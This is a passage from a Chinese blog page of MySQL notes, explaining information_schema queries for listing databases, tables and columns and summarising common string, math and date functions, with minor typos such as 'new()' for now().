<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#998;font-style:italic">-- 查看所有数据库名
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">schema_name</span> <span style="color:#000;font-weight:bold">from</span> information_schema.schemata;
<span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">schema_name</span> <span style="color:#000;font-weight:bold">from</span> schemata;
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121110253739.png">
            <img class="mx-auto" alt="image-20210121110253739" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121110253739.png" />
        </a>
    </p>
<ul>
<li>
<h3 id="tablestables-表-提供了数据库中表的信息"><code>tables</code>:TABLES 表 提供了数据库中<strong>表的信息</strong></h3>
<ul>
<li>
<h4 id="table_name-table_name-字段保存该表中所有表名"><code>table_name</code> ：TABLE_NAME 字段保存该表中所有<strong>表名</strong></h4>
</li>
<li>
<h5 id="table_schema-table_schema-字段保存数据库名可以作为查询条件"><code>table_schema</code>: TABLE_SCHEMA 字段保存<strong>数据库名，可以作为查询条件</strong></h5>
</li>
</ul>
</li>
</ul>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">4
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">5
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#998;font-style:italic">-- 查询所有数据库对应数据表
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">table_name</span>,table_schema <span style="color:#000;font-weight:bold">from</span> tables ;

<span style="color:#998;font-style:italic">-- 查询特定数据库查看表名
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">table_name</span> , table_schema <span style="color:#000;font-weight:bold">from</span> information_schema.tables <span style="color:#000;font-weight:bold">where</span> table_schema <span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#39;test_php&#39;</span>;
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121113048927.png">
            <img class="mx-auto" alt="image-20210121113048927" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121113048927.png" />
        </a>
    </p>
<ul>
<li>
<h3 id="columns-columns-表-提供了表中列的信息信息"><code>columns</code>: COLUMNS 表 提供了表中<strong>列的信息信息</strong></h3>
<ul>
<li>
<h4 id="column_name----column_name-字段保存所有表中字段名"><code>column_name</code> :   COLUMN_NAME 字段保存所有表中<strong>字段名</strong></h4>
</li>
<li>
<p><em><code>table_name</code> ：TABLE_NAME 关联字段保存该表中所有<strong>表名</strong></em></p>
</li>
<li>
<p><em><code>table_schema</code>: TABLE_SCHEMA 关联字段保存<strong>数据库名，可以作为查询条件</strong></em></p>
</li>
</ul>
</li>
</ul>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#998;font-style:italic">-- 查询所有数据库的所有表的字段名
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">column_name</span>, <span style="color:#000;font-weight:bold">table_name</span>, table_schema <span style="color:#000;font-weight:bold">from</span> columns;
</code></pre></td></tr></table>
</div>
</div><p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121115330916.png">
            <img class="mx-auto" alt="image-20210121115330916" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121115330916.png" />
        </a>
    </p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#998;font-style:italic">-- 查询指定数据库，的指定数据表的字段名
</span><span style="color:#998;font-style:italic"></span><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">column_name</span>, <span style="color:#000;font-weight:bold">table_name</span>, table_schema <span style="color:#000;font-weight:bold">from</span> columns <span style="color:#000;font-weight:bold">where</span> <span style="color:#000;font-weight:bold">table_name</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#39;user&#39;</span> <span style="color:#000;font-weight:bold">and</span> table_schema<span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#39;test_php&#39;</span>;
</code></pre></td></tr></table>
</div>
</div><h3 id="mysql-常用内置函数">mysql 常用内置函数</h3>
<h4 id="字符串函数">字符串函数</h4>
<ul>
<li>
<p><code>concat(str1,str2,str3..)</code>: 连接字符串为一个新的字符串</p>
<ul>
<li>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"> <span style="color:#000;font-weight:bold">select</span> concat(<span style="color:#d14">&#39;123&#39;</span>,<span style="color:#d14">&#39;--&#39;</span>,<span style="color:#d14">&#39;user&#39;</span>);
</code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121162845786.png">
            <img class="mx-auto" alt="image-20210121162845786" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121162845786.png" />
        </a>
    </p>
</li>
</ul>
</li>
<li>
<p><code>group_concat(str1,str2 separator ‘分隔符’)</code>: 聚合函数 <a href="https://blog.csdn.net/u012620150/article/details/81945004">详解</a></p>
</li>
<li>
<p><code>length(str)</code>: 返回字符串str中字符的长度</p>
<ul>
<li>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">length</span>( concat(<span style="color:#d14">&#39;123&#39;</span>,<span style="color:#d14">&#39;--&#39;</span>,<span style="color:#d14">&#39;user&#39;</span>));
</code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121163004683.png">
            <img class="mx-auto" alt="image-20210121163004683" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121163004683.png" />
        </a>
    </p>
</li>
</ul>
</li>
<li>
<p><code>left(str,n)</code> : 从字符串左边截取n 个字符</p>
<ul>
<li>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">left</span>(concat(<span style="color:#d14">&#39;123&#39;</span>,<span style="color:#d14">&#39;--&#39;</span>,<span style="color:#d14">&#39;user&#39;</span>),<span style="color:#099">4</span>);
</code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121163141457.png">
            <img class="mx-auto" alt="image-20210121163141457" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121163141457.png" />
        </a>
    </p>
</li>
</ul>
</li>
<li>
<p><code>rigth(str,n)</code>: 从字符串右边截取n 个字符(下标从1开始)</p>
<ul>
<li>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">right</span>(concat(<span style="color:#d14">&#39;123&#39;</span>,<span style="color:#d14">&#39;--&#39;</span>,<span style="color:#d14">&#39;user&#39;</span>),<span style="color:#099">4</span>);
</code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121163352257.png">
            <img class="mx-auto" alt="image-20210121163352257" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121163352257.png" />
        </a>
    </p>
</li>
</ul>
</li>
<li>
<p><code>substr(str,m,n)</code>: 从字符串m 开始截取，向后截取n 个字符，（下标从1开始）</p>
<ul>
<li>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#000;font-weight:bold">select</span> substr(<span style="color:#d14">&#39;abcdef&#39;</span>,<span style="color:#099">3</span>,<span style="color:#099">2</span>);
</code></pre></td></tr></table>
</div>
</div></li>
<li>
<p><!-- raw HTML omitted --></p>
</li>
</ul>
</li>
<li>
<p><code>substring(str,m,n)</code></p>
</li>
<li>
<p><code>mid(str,m,n)</code></p>
</li>
<li>
<p><code>ltrim(str)</code> 去除左空格 <code>rtrim(str)</code>去除右空格 <code>trim(str)</code>去除两边空格</p>
</li>
</ul>
<h4 id="数学函数">数学函数</h4>
<ul>
<li>
<p><code>round(n,d)</code> :  保留小数位四舍五入（n 为原数，d为小数位  ）</p>
</li>
<li>
<p><code>rand()</code>: 返回0~1 之间的随机数字</p>
<ul>
<li>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-sql" data-lang="sql"><span style="color:#000;font-weight:bold">select</span> round(rand(),<span style="color:#099">2</span>);
<span style="color:#998;font-style:italic">-- 数据取出一条数据
</span><span style="color:#998;font-style:italic"></span> <span style="color:#000;font-weight:bold">select</span> <span style="color:#000;font-weight:bold">*</span> <span style="color:#000;font-weight:bold">from</span> <span style="color:#000;font-weight:bold">user</span> <span style="color:#000;font-weight:bold">order</span> <span style="color:#000;font-weight:bold">by</span> rand() <span style="color:#000;font-weight:bold">limit</span> <span style="color:#099">1</span>; 
</code></pre></td></tr></table>
</div>
</div></li>
<li>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121165952312.png">
            <img class="mx-auto" alt="image-20210121165952312" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210121165952312.png" />
        </a>
    </p>
</li>
</ul>
</li>
</ul>
<h4 id="日期函数">日期函数</h4>
<ul>
<li><code>new() </code> : 返回系统日期和时间</li>
<li><code>current_time()</code>: 返回系统时间</li>
<li><code>current_date()</code> : 返回系统日期</li>
</ul>

        </div>

        


        

<div class="post-archive">
    <h2>See Also</h2>
    <ul class="listing">
        
        <li><a href="/post/OWASP-10/CSRF-%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/">CSRF 跨站请求伪造 </a></li>
        
        <li><a href="/post/web-%E5%9F%BA%E7%A1%80/js-%E7%89%B9%E5%AE%9A%E5%8A%9F%E8%83%BD/">JavaScript 代码片段 </a></li>
        
        <li><a href="/post/OWASP-10/XSS-%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/">XSS 跨站脚本漏洞 </a></li>
        
        <li><a href="/post/OWASP-10/%E5%B8%B8%E8%A7%81-payload-/">常用Payload </a></li>
        
        <li><a href="/post/OWASP-10/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E-/">文件上传漏洞 </a></li>
        
    </ul>
</div>


        <div class="post-meta meta-tags">
            
            <ul class="clearfix">
                
                <li><a href='/tags/sql'>sql</a></li>
                
                <li><a href='/tags/mysql'>mysql</a></li>
                
                <li><a href='/tags/%E6%BC%8F%E6%B4%9E'>漏洞</a></li>
                
            </ul>
            
        </div>
    </article>
    
    

    
    
</div>

                    <footer id="footer">
    <div>
        &copy; 2021 <a href="https://gitmatrix.gitee.io/">matrix By matrix</a>
        
    </div>
    <br />
    
    <div>
        <div class="github-badge">
            <a href="https://gohugo.io/" target="_black" rel="nofollow"><span class="badge-subject">Powered by</span><span class="badge-value bg-blue">Hugo</span></a>
        </div>
        
        <div class="github-badge">
            <a href="https://github.com/flysnow-org/maupassant-hugo" target="_black"><span class="badge-subject">Theme</span><span class="badge-value bg-yellowgreen">Maupassant</span></a>
        </div>
    </div>
</footer>


    
    <script type="text/javascript">
        window.MathJax = {
            tex2jax: {
                inlineMath: [['$', '$']],
                processEscapes: true
                }
            };
    </script>
    <script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML' async></script><script src="https://cdn.bootcdn.net/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>

<a id="rocket" href="#top"></a>
<script type="text/javascript" src='/js/totop.js?v=0.0.0' async=""></script>



    <script type="text/javascript" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>




    <script src='/js/douban.js'></script>

                </div>

                <div id="secondary">
    <section class="widget">
        <form id="search" action='https://gitmatrix.gitee.io/search/' method="get" accept-charset="utf-8" target="_blank" _lpchecked="1">
      
      <input type="text" name="q" maxlength="20" placeholder="Search">
      <input type="hidden" name="sitesearch" value="https://gitmatrix.gitee.io/">
      <button type="submit" class="submit icon-search"></button>
</form>
    </section>
    
    <section class="widget">
        <h3 class="widget-title">最近文章</h3>
<ul class="widget-list">
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/" title="Linux 基础配置 ">Linux 基础配置 </a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/linux-%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4-/" title="Linux 常用命令 ">Linux 常用命令 </a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/Linux%E6%96%87%E4%BB%B6%E7%89%B9%E6%AE%8A%E6%9D%83%E9%99%90SUIDSGID%E4%B8%8ESBIT/" title="Linux文件特殊权限 ">Linux文件特殊权限 </a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/Linux-%E7%A3%81%E7%9B%98%E6%8C%82%E8%BD%BD/" title="Liunx 磁盘分区与文件挂载 ">Liunx 磁盘分区与文件挂载 </a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Mysql-%E6%95%B0%E6%8D%AE%E5%BA%93/my.cnf-%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E8%AF%A6%E8%A7%A3/" title="my.cnf 配置文件详解">my.cnf 配置文件详解</a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Mysql-%E6%95%B0%E6%8D%AE%E5%BA%93/Mysql-%E6%93%8D%E4%BD%9C/" title="Mysql 基本操作">Mysql 基本操作</a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Mysql-%E6%95%B0%E6%8D%AE%E5%BA%93/Mysql%E4%BD%93%E7%B3%BB%E7%BB%93%E6%9E%84%E7%AE%A1%E7%90%86/" title="Mysql体系结构管理">Mysql体系结构管理</a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/RAID-%E7%A3%81%E7%9B%98%E9%98%B5%E5%88%97/" title="RAID 磁盘阵列配置 ">RAID 磁盘阵列配置 </a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/rpm-%E4%B8%8E-yum-/" title="RPM 与 Yum ">RPM 与 Yum </a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/SSH/SSH-%E5%9F%BA%E6%9C%AC%E6%93%8D%E4%BD%9C/" title="SSH 基本操作">SSH 基本操作</a>
    </li>
    
</ul>
    </section>

    
<section class="widget">
    <h3 class="widget-title" style="color:#6E718A">课程直达</h3>
    <ul class="widget-list">
        
        <li>
            <a href="https://www.bilibili.com/video/BV1nA411h7C9" title="Burpsuite使用教程" target="_blank" style="color:#6E718A">
                
                    <img src="https://gitee.com/gitmatrix/images/raw/master/img/20210116152721.png">
                
            </a>
        </li>
        
        <li>
            <a href="https://www.bilibili.com/video/BV1yf4y1i7Pb?p=1" title="网络安全提升技术与渗透测试原理深度解析" target="_blank" style="color:#6E718A">
                
                    <img src="https://gitee.com/gitmatrix/images/raw/master/img/6f19fe2958f4d3c5edaee825cda334bac074abc8.jpg">
                
            </a>
        </li>
        
    </ul>
</section>


    <section class="widget">
        <h3 class="widget-title"><a href='/categories/'>分类</a></h3>
<ul class="widget-list">
    
    <li><a href="https://gitmatrix.gitee.io/categories/Liunx/">Liunx (6)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/Mysql/">Mysql (3)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/SSH/">SSH (4)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/Test/">Test (1)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/Web-%E5%AE%89%E5%85%A8/">Web 安全 (9)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/web%E5%9F%BA%E7%A1%80/">web基础 (1)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">信息收集 (10)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/%E5%8D%81%E5%A4%A7%E6%BC%8F%E6%B4%9E/">十大漏洞 (8)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/%E6%95%99%E7%A8%8B/">教程 (1)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%B3%95/">网络安全法 (1)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/%E8%BF%90%E7%BB%B4/">运维 (2)</a></li>
    
</ul>
    </section>

    <section class="widget">
        <h3 class="widget-title"><a href='/tags/'>标签</a></h3>
<div class="tagcloud">
    
    <a href="https://gitmatrix.gitee.io/tags/CSRF/">CSRF</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Chrome-Extension/">Chrome Extension</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Chrome%E6%8F%92%E4%BB%B6/">Chrome插件</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Google-hacking/">Google hacking</a>
    
    <a href="https://gitmatrix.gitee.io/tags/JavaScript/">JavaScript</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Linux/">Linux</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Mysql/">Mysql</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Payload/">Payload</a>
    
    <a href="https://gitmatrix.gitee.io/tags/XSS/">XSS</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Zabbix/">Zabbix</a>
    
    <a href="https://gitmatrix.gitee.io/tags/js/">js</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Mysql/">Mysql</a>
    
    <a href="https://gitmatrix.gitee.io/tags/sql/">sql</a>
    
    <a href="https://gitmatrix.gitee.io/tags/ssh/">ssh</a>
    
    <a href="https://gitmatrix.gitee.io/tags/test/">test</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5%9B%BD%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%B3%95/">中华人民共和国网络安全法</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">基本信息收集</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%8C%87%E7%BA%B9%E8%AF%86%E5%88%AB/">指纹识别</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%94%B6%E9%9B%86%E5%AD%90%E5%9F%9F%E4%BF%A1%E6%81%AF/">收集子域信息</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%94%B6%E9%9B%86%E6%95%8F%E6%84%9F%E7%9B%AE%E5%BD%95%E6%96%87%E4%BB%B6/">收集敏感目录文件</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%94%BB%E5%87%BB/">攻击</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%95%99%E7%A8%8B/">教程</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%95%B4%E7%AB%99%E5%88%86%E6%9E%90/">整站分析</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%96%87%E4%BB%B6/">文件</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%BB%8B%E7%BB%8D/">渗透测试介绍</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%B5%81%E7%A8%8B/">渗透测试流程</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%BC%8F%E6%B4%9E/">漏洞</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E7%9C%9F%E5%AE%9EIP%E5%9C%B0%E5%9D%80%E6%9F%A5%E8%AF%A2/">真实IP地址查询</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E9%9D%B6%E5%9C%BA/">靶场</a>
    
</div>
    </section>

    
<section class="widget">
    <h3 class="widget-title">友情链接</h3>
    <ul class="widget-list">
        
        <li>
            <a target="_blank" href="https://www.bugbank.cn/" title="漏洞银行">漏洞银行</a>
        </li>
        
        <li>
            <a target="_blank" href="https://www.xf1433.com/59.html" title="电脑黑客书籍在线阅读">电脑黑客书籍在线阅读</a>
        </li>
        
        <li>
            <a target="_blank" href="http://yuedu.baidu.com/ebook/14a722970740be1e640e9a3e" title="Android Gradle权威指南">Android Gradle权威指南</a>
        </li>
        
    </ul>
</section>


    <section class="widget">
        <h3 class="widget-title">其它</h3>
        <ul class="widget-list">
            <li><a href="https://gitmatrix.gitee.io/index.xml"></a></li>
        </ul>
    </section>
</div>
            </div>
        </div>
    </div>
</body>

</html>